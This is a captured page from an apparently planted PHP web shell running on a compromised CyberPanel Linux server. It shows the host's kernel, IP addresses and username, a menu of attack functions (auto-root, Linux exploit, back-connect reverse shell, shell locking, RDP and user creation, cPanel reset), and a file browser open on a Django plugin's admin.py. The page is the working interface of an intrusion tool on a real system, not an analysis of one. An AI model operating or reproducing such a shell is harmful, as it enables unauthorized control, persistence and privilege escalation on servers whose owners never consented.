Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
CyberCP /
testPlugin /
[ HOME SHELL ]
Name
Size
Permission
Action
static
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
OS_COMPATIBILITY.md
11.49
KB
-rw-r--r--
SECURITY.md
7.38
KB
-rw-r--r--
__init__.py
80
B
-rw-r--r--
admin.py
747
B
-rw-r--r--
apps.py
245
B
-rw-r--r--
install.sh
16
KB
-rw-r--r--
meta.xml
848
B
-rw-r--r--
middleware.py
7.1
KB
-rw-r--r--
models.py
1.43
KB
-rw-r--r--
os_config.py
13.06
KB
-rw-r--r--
security.py
10.04
KB
-rw-r--r--
signals.py
486
B
-rw-r--r--
test_os_compatibility.py
16.7
KB
-rw-r--r--
urls.py
761
B
-rw-r--r--
views.py
11.77
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin.py
# -*- coding: utf-8 -*- from django.contrib import admin from .models import TestPluginSettings, TestPluginLog @admin.register(TestPluginSettings) class TestPluginSettingsAdmin(admin.ModelAdmin): list_display = ['user', 'plugin_enabled', 'test_count', 'last_test_time'] list_filter = ['plugin_enabled', 'last_test_time'] search_fields = ['user__username', 'custom_message'] readonly_fields = ['last_test_time'] @admin.register(TestPluginLog) class TestPluginLogAdmin(admin.ModelAdmin): list_display = ['timestamp', 'action', 'message', 'user'] list_filter = ['action', 'timestamp', 'user'] search_fields = ['action', 'message', 'user__username'] readonly_fields = ['timestamp'] date_hierarchy = 'timestamp'
Close